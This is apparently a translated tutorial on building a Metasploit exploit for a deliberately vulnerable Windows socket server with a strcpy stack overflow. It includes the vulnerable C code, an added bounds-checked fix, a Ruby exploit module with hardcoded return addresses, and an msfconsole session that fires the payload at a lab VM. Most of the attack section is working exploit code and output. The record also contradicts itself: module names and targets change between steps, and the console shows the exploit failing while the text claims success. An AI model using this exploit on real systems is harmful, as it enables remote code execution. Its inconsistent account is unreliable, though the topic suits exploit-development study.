A simple test of publishing a PoC with msf

Let's look at a piece of vulnerable code.

#include <iostream>
#include <cstdlib>
#include <cstring>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
using namespace std;

// Deliberately vulnerable: strcpy() copies the received data into a
// 200-byte stack buffer without any length check.
void msg_display(char *buf)
{
    char msg[200];
    strcpy(msg, buf);
    cout << "****************" << endl;
    cout << msg << endl;
}

int main()
{
    SOCKET sock, msgsock;
    int length, receive_len;
    struct sockaddr_in sock_server, sock_client;
    char buf[0x200];
    WSADATA wsa;

    WSAStartup(MAKEWORD(1, 1), &wsa);
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
        cout << sock << " Socket Creating Error!" << endl;
        exit(1);
    }

    sock_server.sin_family = AF_INET;
    sock_server.sin_port = htons(7777);
    sock_server.sin_addr.S_un.S_addr = INADDR_ANY;
    if (bind(sock, (sockaddr *)&sock_server, sizeof(sock_server))) {
        cout << "binding stream socket error!" << endl;
    }

    cout << "**********************************" << endl;
    cout << "     exploit target server 1.0    " << endl;
    cout << "**********************************" << endl;
    listen(sock, 4);

    length = sizeof(struct sockaddr);
    do {
        msgsock = accept(sock, (struct sockaddr *)&sock_client, &length);
        if (msgsock == INVALID_SOCKET) {
            cout << "accept error!" << endl;
            break;
        }
        do {
            memset(buf, 0, sizeof(buf));
            if ((receive_len = recv(msgsock, buf, sizeof(buf), 0)) < 0) {
                cout << "reading stream message error!" << endl;
                receive_len = 0;
            }
            msg_display(buf);   // no length is passed: this is the overflow point
        } while (receive_len);
        closesocket(msgsock);
    } while (1);

    WSACleanup();
    return 0;
}

msg_display contains a stack overflow. The server test environment is a Windows 2000 Server virtual machine; run the program there so it listens on port 7777.
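For contrast, here is what a bounds-checked msg_display looks like. This is an added example, not code from the original post: the names copy_bounded, msg_display_safe and demo_overlong are chosen here, and the only assumption carried over is the 200-byte message buffer. The key change is that the caller hands over the length recv() returned, so the copy never depends on the sender placing a NUL terminator within 200 bytes (the original's 0x200-byte receive buffer can be filled entirely with non-NUL bytes, in which case strcpy reads past it as well).

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define MSG_MAX 200   /* same buffer size as the original msg_display() */

/* Copy at most dstsz-1 bytes of src into dst and always NUL-terminate.
 * src is treated as a raw run of srclen bytes (as recv() hands it over),
 * not as a C string, so a missing terminator cannot cause a read past
 * the receive buffer. Returns how many bytes did not fit. */
size_t copy_bounded(char *dst, size_t dstsz, const char *src, size_t srclen)
{
    size_t n = (srclen < dstsz - 1) ? srclen : dstsz - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return srclen - n;
}

/* Hardened replacement for msg_display(): the caller passes the length
 * that recv() returned instead of relying on strcpy() to find a NUL.
 * Returns the number of truncated bytes so the caller can log or
 * reject oversized messages. */
size_t msg_display_safe(const char *buf, size_t len)
{
    char msg[MSG_MAX];
    size_t dropped = copy_bounded(msg, sizeof msg, buf, len);

    printf("****************\n%s\n", msg);
    if (dropped > 0)
        printf("[!] message truncated, %zu byte(s) dropped\n", dropped);
    return dropped;
}

/* Demo helper (hypothetical, added here): builds an n-byte message of
 * 'a' characters as a constructed stand-in for an oversized network
 * message and feeds it to msg_display_safe(). */
size_t demo_overlong(size_t n)
{
    char in[1024];
    if (n > sizeof in)
        n = sizeof in;
    memset(in, 'a', n);
    return msg_display_safe(in, n);
}

int main(void)
{
    demo_overlong(10);    /* fits: nothing dropped */
    demo_overlong(400);   /* would have overflowed msg[] in the original */
    return 0;
}
```

In the server's receive loop the call would become msg_display_safe(buf, receive_len) after the recv() error check, and a non-zero return value is a cheap signal worth logging: a legitimate client of a 200-byte message protocol has no reason to send 400 bytes.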

Now a Ruby script.

#!/usr/bin/env ruby
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Evil0r_POC',
      'Version'        => '1.0',
      'Platform'       => 'win',
      'Privileged'     => true,
      'License'        => MSF_LICENSE,
      'Author'         => 'Evil0r',
      'Targets'        =>
        [
          ['Windows 2000',   { 'Ret' => [200, 0x77F8948B] }],
          ['Windows XP SP2', { 'Ret' => [200, 0x7C914393] }],
        ],
      'DefaultTarget'  => 0,
      'Payload'        =>
        {
          'Space'           => 200,
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500,
        },
      'Description'    => %q{
        this module is exploit practice of book "Vulnerability Exploit and
        Analysis Technique" used only for educational purpose
      },
      'Arch'           => 'x86',
      'References'     =>
        [
          [ 'URL', 'http://blog.csdn.net/evi10r' ],
          [ 'CVE', '44444' ],
        ],
      'DefaultOptions' => { 'EXITFUNC' => 'process' }
    ))
  end # end of initialize

  def exploit
    connect
    print_status("Sending #{payload.encoded.length} byte payload...")
    buf = 'a' * target['Ret'][0]          # padding: Ret[0] bytes
    buf << [target['Ret'][1]].pack('V')   # Ret[1] as a little-endian DWORD
    buf << payload.encoded
    sock.put(buf)
    handler
    disconnect
  end # end of exploit
end

Put Evil0r_Poc.rb under the exploits directory (create a new folder for it), then open the msf console and run show exploits; the module we added appears in the list.

You can check its details with info:

msf > info Evil0r/Evil0r_Poc


Name: Evil0r_POC
Version: 1.0
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Normal


Provided by:
Evil0r


Available targets:
Id Name
-- ----
0 Windows 2000
1 Windows XP SP2


Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT yes The target port


Payload information:
Space: 200
Avoid: 1 characters


Description:
this module is exploit practice of book "Vulnerability Exploit and
Analysis Technique" used only for educational purpose


References:
http://blog.csdn.net/evi10r
http://cve.mitre.org/cgi-bin/cvename.cgi?name=44444

Now we use it to run an attack test against the Windows 2000 Server virtual machine.

msf > use failwest/est
[-] Failed to load module: failwest/est
msf > use failwest/test
msf exploit(test) > show targets


Exploit targets:


Id Name
-- ----
0 Windows 2000
1 Windows XP SP3




msf exploit(test) > set target 0
target => 0
msf exploit(test) > show payloads


Compatible Payloads
===================


Name Rank Description
---- ---- -----------
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/exec normal Windows Execute Command
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupvncinject/reverse_nonx_tcp normal Windows VNC Inject (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupvncinject/reverse_ord_tcp normal Windows VNC Inject (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)


msf exploit(test) > set payload windows/exec
payload => windows/exec
msf exploit(test) > show options


Module options:


Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT yes The target port




Payload options (windows/exec):


Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
EXITFUNC process yes Exit technique: seh, thread, process




Exploit target:


Id Name
-- ----
0 Windows 2000




msf exploit(test) > set rhost 192.168.79.132
rhost => 192.168.79.132
msf exploit(test) > set rport 7777
rport => 7777
msf exploit(test) > set cmd calc
cmd => calc
msf exploit(test) > set exitfunc seh
exitfunc => seh
msf exploit(test) > exploit


[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.


Then we see a calculator window pop up on the Windows 2000 VM: the shellcode executed successfully.
